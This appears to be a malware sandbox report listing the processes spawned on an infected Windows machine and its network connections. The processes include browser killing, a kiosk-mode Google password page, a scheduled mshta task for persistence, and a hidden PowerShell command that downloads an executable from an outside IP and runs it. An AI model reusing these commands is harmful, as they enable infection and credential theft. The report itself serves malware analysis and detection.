"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 960"
C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe
"C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2848 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3268 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2620 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5008 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,11904248750407250965,11742923239378241490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3632 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe
"C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe"
C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe
"C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2380 -ip 2380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 2508
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe
"C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6ad0898-2474-4064-80a5-208c64fe6cd3} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" gpu
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99da546f8,0x7ff99da54708,0x7ff99da54718
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf4158b1-cb35-4363-8607-9bfc511fd242} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3156 -childID 1 -isForBrowser -prefsHandle 3184 -prefMapHandle 3172 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cde9da2-5705-47dd-8825-a34801ab3914} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 960"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2812 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3532 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe
"C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3632 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2092 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn fD235maYYx8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10110400121\am_no.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3592 /prefetch:2
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -childID 2 -isForBrowser -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a67518d-5779-43e7-8a1a-0724f092761d} 5324 "\\.\pipe\gecko-crash-server-pipe.5324" tab
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn fD235maYYx8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\zAZE3yTrd.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2796 /prefetch:2
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6Z8KTLLJMNBFJG8M1V4DCDHVI54AMKCK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4018677202720853627,4106250781844844496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2588 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | dugong.ydns.eu | udp |
| DE | 38.180.229.217:80 | dugong.ydns.eu | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | avx.medianewsonline.com | udp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| DE | 38.180.229.217:80 | dugong.ydns.eu | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| GB | 172.217.169.10:443 | ogads-pa.googleapis.com | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 13.92.180.205:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | udp | |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
